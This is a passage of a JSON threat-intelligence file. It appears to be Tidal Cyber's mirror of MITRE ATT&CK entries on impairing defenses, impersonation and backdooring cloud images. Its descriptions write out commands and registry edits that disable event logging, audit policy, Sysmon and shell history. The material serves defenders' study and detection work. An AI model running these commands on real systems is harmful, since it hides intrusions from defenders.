"dest-uuid": "0a4dd066-6a28-4dcb-ab3d-215fc01db9cb",
"type": "similar"
},
{
"dest-uuid": "0df21d65-c885-415a-8f91-477ae1b37839",
"type": "similar"
},
{
"dest-uuid": "08188de6-22c8-42af-b01c-f1c250c22514",
"type": "similar"
},
{
"dest-uuid": "bd569ff9-c038-48c0-83d0-f5c784b439bc",
"type": "similar"
},
{
"dest-uuid": "bc996f67-7cb7-4ba4-9156-4f2f8283d66d",
"type": "similar"
}
],
"uuid": "1085d0c6-4ff3-45f1-8e0c-d8f334f4ba68",
"value": "Hijack Execution Flow"
},
{
"description": "Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://app.tidalcyber.com/technique/4f7d0afb-92ce-429b-9ef5-dc6a7fc4f4a8). \n\nCloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary may introduce new firewall rules or policies to allow access into a victim cloud environment. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups to allow any TCP/IP connectivity, or remove networking limitations to support traffic associated with malicious activity (such as cryptomining).<sup>[[Expel IO Evil in AWS](https://app.tidalcyber.com/references/4c2424d6-670b-4db0-a752-868b4c954e29)]</sup><sup>[[Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022](https://app.tidalcyber.com/references/af755ba2-97c2-5152-ab00-2e24740f69f3)]</sup>\n\nModifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1562.007"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "ccb72576-4e85-4c7b-89b8-fa67cc6cdbef",
"value": "Disable or Modify Cloud Firewall"
},
{
"description": "An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.\n\nFor example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.<sup>[[Following the CloudTrail: Generating strong AWS security signals with Sumo Logic](https://app.tidalcyber.com/references/96560211-59b3-4eae-b8a3-2f988f6fdca3)]</sup> They may alternatively tamper with logging functionality for example, by removing any associated SNS topics, disabling multi-region logging, or disabling settings that validate and/or encrypt log files.<sup>[[AWS Update Trail](https://app.tidalcyber.com/references/a94e1e4a-2963-5563-a8a6-ab9f64a86476)]</sup><sup>[[Pacu Detection Disruption Module](https://app.tidalcyber.com/references/deba605b-7abc-5794-a820-448a395aab69)]</sup> In Office 365, an adversary may disable logging on mail collection activities for specific users by using the `Set-MailboxAuditBypassAssociation` cmdlet, by disabling M365 Advanced Auditing for the user, or by downgrading the users license from an Enterprise E5 to an Enterprise E3 license.<sup>[[Dark Reading Microsoft 365 Attacks 2021](https://app.tidalcyber.com/references/f26d3aa4-6966-53c4-b9d1-848420377eae)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1562.008"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "6824cdb3-a4c5-45a8-a3d5-5a5afd347214",
"value": "Disable or Modify Cloud Logs"
},
{
"description": "Adversaries may disable or modify the Linux audit system to hide malicious activity and avoid detection. Linux admins use the Linux Audit system to track security-relevant information on a system. The Linux Audit system operates at the kernel-level and maintains event logs on application and system activity such as process, network, file, and login events based on pre-configured rules.\n\nOften referred to as `auditd`, this is the name of the daemon used to write events to disk and is governed by the parameters set in the `audit.conf` configuration file. Two primary ways to configure the log generation rules are through the command line `auditctl` utility and the file `/etc/audit/audit.rules`, containing a sequence of `auditctl` commands loaded at boot time.<sup>[[Red Hat System Auditing](https://app.tidalcyber.com/references/599337b3-8587-5578-9be5-e6e4f0edd0ef)]</sup><sup>[[IzyKnows auditd threat detection 2022](https://app.tidalcyber.com/references/8a2f5c37-df28-587e-81b8-4bf7bb796854)]</sup>\n\nWith root privileges, adversaries may be able to ensure their activity is not logged through disabling the Audit system service, editing the configuration/rule files, or by hooking the Audit system library functions. Using the command line, adversaries can disable the Audit system service through killing processes associated with `auditd` daemon or use `systemctl` to stop the Audit service. Adversaries can also hook Audit system functions to disable logging or modify the rules contained in the `/etc/audit/audit.rules` or `audit.conf` files to ignore malicious activity.<sup>[[Trustwave Honeypot SkidMap 2023](https://app.tidalcyber.com/references/300505ae-bb7a-503d-84c5-9ff021eb6f3a)]</sup><sup>[[ESET Ebury Feb 2014](https://app.tidalcyber.com/references/eb6d4f77-ac63-4cb8-8487-20f9e709334b)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1562.012"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "d9eb2887-840e-5ed7-bb4b-3b210f4147f9",
"value": "Disable or Modify Linux Audit System"
},
{
"description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.\n\nModifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. For example, adversaries may add a new firewall rule for a well-known protocol (such as RDP) using a non-traditional and potentially less securitized port (i.e. [Non-Standard Port](https://app.tidalcyber.com/technique/36850d17-a7d5-41ac-aa89-040b9c0b2b3f)).<sup>[[change_rdp_port_conti](https://app.tidalcyber.com/references/c0deb077-6c26-52f1-9e7c-d1fb535a02a0)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1562.004"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "4f7d0afb-92ce-429b-9ef5-dc6a7fc4f4a8",
"value": "Disable or Modify System Firewall"
},
{
"description": "Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.<sup>[[SCADAfence_ransomware](https://app.tidalcyber.com/references/24c80db5-37a7-46ee-b232-f3c3ffb10f0a)]</sup>\n\nAdversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://app.tidalcyber.com/technique/154dccf2-21fa-4aee-99cc-d959d841f8b1), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.<sup>[[OutFlank System Calls](https://app.tidalcyber.com/references/c4c3370a-2d6b-4ebd-961e-58d584066377)]</sup><sup>[[MDSec System Calls](https://app.tidalcyber.com/references/b461e226-1317-4ce4-a195-ba4c4957db99)]</sup> \n\nAdversaries may also focus on specific applications such as Sysmon. For example, the “Start” and “Enable” values in <code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Microsoft-Windows-Sysmon-Operational</code> may be modified to tamper with and potentially disable Sysmon logging.<sup>[[disable_win_evt_logging](https://app.tidalcyber.com/references/408c0c8c-5d8e-5ebe-bd31-81b405c615d8)]</sup> \n\nOn network devices, adversaries may attempt to skip digital signature verification checks by altering startup configuration files and effectively disabling firmware verification that typically occurs at boot.<sup>[[Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation](https://app.tidalcyber.com/references/a43dd8ce-23d6-5768-8522-6973dc45e1ac)]</sup><sup>[[Analysis of FG-IR-22-369](https://app.tidalcyber.com/references/f12b141e-6bb2-5563-9665-5756fec2d5e7)]</sup>\n\nIn cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor.\n\nFurthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.<sup>[[chasing_avaddon_ransomware](https://app.tidalcyber.com/references/c5aeed6b-2d5d-4d49-b05e-261d565808d9)]</sup><sup>[[dharma_ransomware](https://app.tidalcyber.com/references/dfd168c0-40da-4402-a123-963eb8e2125a)]</sup><sup>[[demystifying_ryuk](https://app.tidalcyber.com/references/3dc684c7-14de-4dc0-9f11-79160c4f5038)]</sup><sup>[[doppelpaymer_crowdstrike](https://app.tidalcyber.com/references/54b5d8af-21f0-4d1c-ada8-b87db85dd742)]</sup> For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.<sup>[[demystifying_ryuk](https://app.tidalcyber.com/references/3dc684c7-14de-4dc0-9f11-79160c4f5038)]</sup>\n\nAdditionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c)), which may lead to bypassing anti-tampering features.<sup>[[avoslocker_ransomware](https://app.tidalcyber.com/references/ea2756ce-a183-4c80-af11-92374ad045b2)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1562.001"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "9f290216-b2ab-47b5-b9ae-a94ae6d357c6",
"value": "Disable or Modify Tools"
},
{
"description": "Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.<sup>[[Windows Log Events](https://app.tidalcyber.com/references/53464503-6e6f-45d8-a208-1820678deeac)]</sup> This data is used by security tools and analysts to generate detections.\n\nThe EventLog service maintains event logs from various system components and applications.<sup>[[EventLog_Core_Technologies](https://app.tidalcyber.com/references/2a1f452f-57b6-4764-b474-befa7787642d)]</sup> By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to <code>Security Settings\\Local Policies\\Audit Policy</code> for basic audit policy settings or <code>Security Settings\\Advanced Audit Policy Configuration</code> for advanced audit policy settings.<sup>[[Audit_Policy_Microsoft](https://app.tidalcyber.com/references/9ff43f64-7fcb-4aa3-9599-9d00774d8da5)]</sup><sup>[[Advanced_sec_audit_policy_settings](https://app.tidalcyber.com/references/9aef57b1-1a2e-4833-815e-887616cc0570)]</sup> <code>auditpol.exe</code> may also be used to set audit policies.<sup>[[auditpol](https://app.tidalcyber.com/references/20d18ecf-d7d3-4433-9a3c-c28be71de4b1)]</sup>\n\nAdversaries may target system-wide logging or just that of a particular application. For example, the Windows EventLog service may be disabled using the <code>Set-Service -Name EventLog -Status Stopped</code> or <code>sc config eventlog start=disabled</code> commands (followed by manually stopping the service using <code>Stop-Service -Name EventLog</code>).<sup>[[Disable_Win_Event_Logging](https://app.tidalcyber.com/references/0fa5e507-33dc-40ea-b960-bcd9aa024ab1)]</sup><sup>[[disable_win_evt_logging](https://app.tidalcyber.com/references/408c0c8c-5d8e-5ebe-bd31-81b405c615d8)]</sup> Additionally, the service may be disabled by modifying the “Start” value in <code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog</code> then restarting the system for the change to take effect.<sup>[[disable_win_evt_logging](https://app.tidalcyber.com/references/408c0c8c-5d8e-5ebe-bd31-81b405c615d8)]</sup>\n\nThere are several ways to disable the EventLog service via registry key modification. First, without Administrator privileges, adversaries may modify the \"Start\" value in the key <code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Security</code>, then reboot the system to disable the Security EventLog.<sup>[[winser19_file_overwrite_bug_twitter](https://app.tidalcyber.com/references/158d971e-2f96-5200-8a87-d3887de30ff0)]</sup> Second, with Administrator privilege, adversaries may modify the same values in <code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-System</code> and <code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Application</code> to disable the entire EventLog.<sup>[[disable_win_evt_logging](https://app.tidalcyber.com/references/408c0c8c-5d8e-5ebe-bd31-81b405c615d8)]</sup>\n\nAdditionally, adversaries may use <code>auditpol</code> and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the <code>/success</code> or <code>/failure</code> parameters. For example, <code>auditpol /set /category:”Account Logon” /success:disable /failure:disable</code> turns off auditing for the Account Logon category.<sup>[[auditpol.exe_STRONTIC](https://app.tidalcyber.com/references/c8a305b3-cd17-4415-a740-32787da703cd)]</sup><sup>[[T1562.002_redcanaryco](https://app.tidalcyber.com/references/e136f5a2-d4c2-4c6c-8f72-0f8ed9abeed1)]</sup> To clear the audit policy, adversaries may run the following lines: <code>auditpol /clear /y</code> or <code>auditpol /remove /allusers</code>.<sup>[[T1562.002_redcanaryco](https://app.tidalcyber.com/references/e136f5a2-d4c2-4c6c-8f72-0f8ed9abeed1)]</sup>\n\nBy disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1562.002"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "97918962-6509-4369-b2b5-5d02681c6700",
"value": "Disable Windows Event Logging"
},
{
"description": "Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls. Downgrade attacks typically take advantage of a systems backward compatibility to force it into less secure modes of operation. \n\nAdversaries may downgrade and use various less-secure versions of features of a system, such as [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c)s or even network protocols that can be abused to enable [Adversary-in-the-Middle](https://app.tidalcyber.com/technique/d98dbf30-c454-42ff-a9f3-2cd3319cc0d9) or [Network Sniffing](https://app.tidalcyber.com/technique/bbad213d-477d-43bf-9501-ad7d74bac323).<sup>[[Praetorian TLS Downgrade Attack 2014](https://app.tidalcyber.com/references/4375602d-4b5f-476d-82f8-3cef84d3378e)]</sup> For example, [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) versions 5+ includes Script Block Logging (SBL) which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to [Impair Defenses](https://app.tidalcyber.com/technique/e3be3d76-0a36-4060-8003-3b39c557f728) while running malicious scripts that may have otherwise been detected.<sup>[[CrowdStrike BGH Ransomware 2021](https://app.tidalcyber.com/references/a4cb3caf-e7ef-4662-93c6-63a0c3352a32)]</sup><sup>[[Mandiant BYOL 2018](https://app.tidalcyber.com/references/104a1c1c-0899-4ff9-a5c4-73de702c467d)]</sup><sup>[[att_def_ps_logging](https://app.tidalcyber.com/references/52212570-b1a6-4249-99d4-3bcf66c27140)]</sup>\n\nAdversaries may similarly target network traffic to downgrade from an encrypted HTTPS connection to an unsecured HTTP connection that exposes network data in clear text.<sup>[[Targeted SSL Stripping Attacks Are Real](https://app.tidalcyber.com/references/714528e8-0f2e-50a3-93c0-c560a34ba973)]</sup><sup>[[Crowdstrike Downgrade](https://app.tidalcyber.com/references/47856c5f-6c4c-5b4c-bbc1-ccb6848d9b74)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1562.010"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "257fffe4-d17b-4e63-a41c-8388936d6215",
"value": "Downgrade Attack"
},
{
"description": "Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done. \n\nOn Linux and macOS, command history is tracked in a file pointed to by the environment variable <code>HISTFILE</code>. When a user logs off a system, this information is flushed to a file in the user's home directory called <code>~/.bash_history</code>. The <code>HISTCONTROL</code> environment variable keeps track of what should be saved by the <code>history</code> command and eventually into the <code>~/.bash_history</code> file when a user logs out. <code>HISTCONTROL</code> does not exist by default on macOS, but can be set by the user and will be respected.\n\nAdversaries may clear the history environment variable (<code>unset HISTFILE</code>) or set the command history size to zero (<code>export HISTFILESIZE=0</code>) to prevent logging of commands. Additionally, <code>HISTCONTROL</code> can be configured to ignore commands that start with a space by simply setting it to \"ignorespace\". <code>HISTCONTROL</code> can also be set to ignore duplicate commands by setting it to \"ignoredups\". In some Linux systems, this is set by default to \"ignoreboth\" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands. \n\nOn Windows systems, the <code>PSReadLine</code> module tracks commands used in all PowerShell sessions and writes them to a file (<code>$env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt</code> by default). Adversaries may change where these logs are saved using <code>Set-PSReadLineOption -HistorySavePath {File Path}</code>. This will cause <code>ConsoleHost_history.txt</code> to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command <code>Set-PSReadlineOption -HistorySaveStyle SaveNothing</code>.<sup>[[Microsoft PowerShell Command History](https://app.tidalcyber.com/references/6c873fb4-db43-4bad-b5e4-a7d45cbe796f)]</sup><sup>[[Sophos PowerShell command audit](https://app.tidalcyber.com/references/441f289c-7fdc-4cf1-9379-960be75c7202)]</sup><sup>[[Sophos PowerShell Command History Forensics](https://app.tidalcyber.com/references/9cff28da-c379-49e7-b971-7dccc72054fc)]</sup>\n\nAdversaries may also leverage a [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) on network devices to disable historical command logging (e.g. <code>no logging</code>).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1562.003"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "fe8b3b28-41ad-405b-a2b8-9c10048550c2",
"value": "Impair Command History Logging"
},
{
"description": "An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting<sup>[[Microsoft Lamin Sept 2017](https://app.tidalcyber.com/references/84b8b159-6e85-4329-8903-aca156f4ed84)]</sup> or even disabling host-based sensors, such as Event Tracing for Windows (ETW)<sup>[[Microsoft About Event Tracing 2018](https://app.tidalcyber.com/references/689d944f-ad66-4908-91fb-bb1ecdafe8d9)]</sup>, by tampering settings that control the collection and flow of event telemetry.<sup>[[Medium Event Tracing Tampering 2018](https://app.tidalcyber.com/references/cd1a7b9a-183f-4acf-95c8-14d9475d0551)]</sup> These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) or [Windows Management Instrumentation](https://app.tidalcyber.com/technique/c37795d9-8970-461f-9491-3086d6b4b69a).\n\nFor example, adversaries may modify the `File` value in <code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Security</code> to hide their malicious actions in a new or different .evtx log file. This action does not require a system reboot and takes effect immediately.<sup>[[disable_win_evt_logging](https://app.tidalcyber.com/references/408c0c8c-5d8e-5ebe-bd31-81b405c615d8)]</sup> \n\nETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) <code>Set-EtwTraceProvider</code> cmdlet or by interfacing directly with the Registry to make alterations.\n\nIn the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.\n\nIn Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities to facilitate follow on behaviors <sup>[[LemonDuck](https://app.tidalcyber.com/references/3a7ea56a-3b19-4b69-a206-6eb7c4ae609d)]</sup>.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1562.006"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "154dccf2-21fa-4aee-99cc-d959d841f8b1",
"value": "Indicator Blocking"
},
{
"description": "Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.<sup>[[Microsoft Safe Mode](https://app.tidalcyber.com/references/fdddb25b-22ba-4433-b25f-bad340ffc849)]</sup><sup>[[Sophos Snatch Ransomware 2019](https://app.tidalcyber.com/references/63019d16-07ec-4e53-98b7-529cc09b8429)]</sup>\n\nAdversaries may abuse safe mode to disable endpoint defenses that may not start with a limited boot. Hosts can be forced into safe mode after the next reboot via modifications to Boot Configuration Data (BCD) stores, which are files that manage boot application settings.<sup>[[Microsoft bcdedit 2021](https://app.tidalcyber.com/references/40dedfcb-f666-4f2d-a518-5cd4ae2e273c)]</sup>\n\nAdversaries may also add their malicious applications to the list of minimal services that start in safe mode by modifying relevant Registry values (i.e. [Modify Registry](https://app.tidalcyber.com/technique/0dfeab84-3c42-4b56-9021-70fe5be4092b)). Malicious [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66) (COM) objects may also be registered and loaded in safe mode.<sup>[[Sophos Snatch Ransomware 2019](https://app.tidalcyber.com/references/63019d16-07ec-4e53-98b7-529cc09b8429)]</sup><sup>[[CyberArk Labs Safe Mode 2016](https://app.tidalcyber.com/references/bd9c14dd-0e2a-447b-a245-f548734d2400)]</sup><sup>[[Cybereason Nocturnus MedusaLocker 2020](https://app.tidalcyber.com/references/f7b41120-8455-409f-ad9c-815c2c43edfd)]</sup><sup>[[BleepingComputer REvil 2021](https://app.tidalcyber.com/references/790ef274-aea4-49b7-8b59-1b95185c5f50)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1562.009"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "e6549d57-de83-4fee-96f1-2c4a1cdb654f",
"value": "Safe Mode Boot"
},
{
"description": "Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders awareness of malicious activity.<sup>[[BlackBasta](https://app.tidalcyber.com/references/c7e55e37-d051-5111-8d0a-738656f88650)]</sup> Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.\n\nRather than or in addition to [Indicator Blocking](https://app.tidalcyber.com/technique/154dccf2-21fa-4aee-99cc-d959d841f8b1), an adversary can spoof positive affirmations that security tools are continuing to function even after legitimate security tools have been disabled (e.g., [Disable or Modify Tools](https://app.tidalcyber.com/technique/9f290216-b2ab-47b5-b9ae-a94ae6d357c6)). An adversary can also present a “healthy” system status even after infection. This can be abused to enable further malicious activity by delaying defender responses.\n\nFor example, adversaries may show a fake Windows Security GUI and tray icon with a “healthy” system status after Windows Defender and other system tools have been disabled.<sup>[[BlackBasta](https://app.tidalcyber.com/references/c7e55e37-d051-5111-8d0a-738656f88650)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1562.011"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "67fa2827-fd64-5bf7-bf77-27b6ffc8f77f",
"value": "Spoof Security Alerting"
},
{
"description": "Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.\n\nAdversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.<sup>[[Emotet shutdown](https://app.tidalcyber.com/references/02e6c7bf-f81c-53a3-b771-fd77d4cdb5a0)]</sup>\n\nAdversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.",
"meta": {
"platforms": [
"Containers",
"IaaS",
"Linux",
"macOS",
"Network",
"Office 365",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
},
{
"dest-uuid": "ccb72576-4e85-4c7b-89b8-fa67cc6cdbef",
"type": "similar"
},
{
"dest-uuid": "6824cdb3-a4c5-45a8-a3d5-5a5afd347214",
"type": "similar"
},
{
"dest-uuid": "d9eb2887-840e-5ed7-bb4b-3b210f4147f9",
"type": "similar"
},
{
"dest-uuid": "4f7d0afb-92ce-429b-9ef5-dc6a7fc4f4a8",
"type": "similar"
},
{
"dest-uuid": "9f290216-b2ab-47b5-b9ae-a94ae6d357c6",
"type": "similar"
},
{
"dest-uuid": "97918962-6509-4369-b2b5-5d02681c6700",
"type": "similar"
},
{
"dest-uuid": "257fffe4-d17b-4e63-a41c-8388936d6215",
"type": "similar"
},
{
"dest-uuid": "fe8b3b28-41ad-405b-a2b8-9c10048550c2",
"type": "similar"
},
{
"dest-uuid": "154dccf2-21fa-4aee-99cc-d959d841f8b1",
"type": "similar"
},
{
"dest-uuid": "e6549d57-de83-4fee-96f1-2c4a1cdb654f",
"type": "similar"
},
{
"dest-uuid": "67fa2827-fd64-5bf7-bf77-27b6ffc8f77f",
"type": "similar"
}
],
"uuid": "e3be3d76-0a36-4060-8003-3b39c557f728",
"value": "Impair Defenses"
},
{
"description": "Adversaries may impersonate a trusted person or organization in order to persuade and trick a target into performing some action on their behalf. For example, adversaries may communicate with victims (via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06), [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533), or [Internal Spearphishing](https://app.tidalcyber.com/technique/4f4ea659-7653-4bfd-a525-b2af32c5899b)) while impersonating a known sender such as an executive, colleague, or third-party vendor. Established trust can then be leveraged to accomplish an adversarys ultimate goals, possibly against multiple victims. \n \nIn many cases of business email compromise or email fraud campaigns, adversaries use impersonation to defraud victims -- deceiving them into sending money or divulging information that ultimately enables [Financial Theft](https://app.tidalcyber.com/technique/b9c9fd13-c10c-5e78-aeeb-ac18dc0605f9).\n\nAdversaries will often also use social engineering techniques such as manipulative and persuasive language in email subject lines and body text such as `payment`, `request`, or `urgent` to push the victim to act quickly before malicious activity is detected. These campaigns are often specifically targeted against people who, due to job roles and/or accesses, can carry out the adversarys goal. \n \nImpersonation is typically preceded by reconnaissance techniques such as [Gather Victim Identity Information](https://app.tidalcyber.com/technique/aea36489-047e-4c4a-ab26-c51fd3556182) and [Gather Victim Org Information](https://app.tidalcyber.com/technique/e55d2e4b-07d8-4c22-b543-c187be320578) as well as acquiring infrastructure such as email domains (i.e. [Domains](https://app.tidalcyber.com/technique/b9f5f6b7-ecff-48c8-a23e-c58fd9e41a0d)) to substantiate their false identity.<sup>[[CrowdStrike-BEC](https://app.tidalcyber.com/references/7e674a8d-e79f-5cb0-8ad2-a7678e647c6f)]</sup>\n \nThere is the potential for multiple victims in campaigns involving impersonation. For example, an adversary may [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3) targeting one organization which can then be used to support impersonation against other entities.<sup>[[VEC](https://app.tidalcyber.com/references/4fd7c9f7-4731-524a-b332-9cb7f2c025ae)]</sup>",
"meta": {
"platforms": [
"Google Workspace",
"Linux",
"macOS",
"Office 365",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "20417e43-6ffa-5d36-a2ef-e27cd5a4b8f1",
"value": "Impersonation"
},
{
"description": "Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://app.tidalcyber.com/technique/8ecf5275-c6d1-4fe3-a24a-63fa1f3144fe), this technique focuses on adversaries implanting an image in a registry within a victims environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.<sup>[[Rhino Labs Cloud Image Backdoor Technique Sept 2019](https://app.tidalcyber.com/references/8fb46ed8-0c21-4b57-b2a6-89cb28f0abaf)]</sup>\n\nA tool has been developed to facilitate planting backdoors in cloud container images.<sup>[[Rhino Labs Cloud Backdoor September 2019](https://app.tidalcyber.com/references/ac31b781-dbe4-49c2-b7af-dfb23d435ce8)]</sup> If an adversary has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a [Web Shell](https://app.tidalcyber.com/technique/05a5318f-476d-44c1-8a85-9466295d31dd).<sup>[[Rhino Labs Cloud Image Backdoor Technique Sept 2019](https://app.tidalcyber.com/references/8fb46ed8-0c21-4b57-b2a6-89cb28f0abaf)]</sup>",
"meta": {
"platforms": [
"Containers",
"IaaS"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
}
],
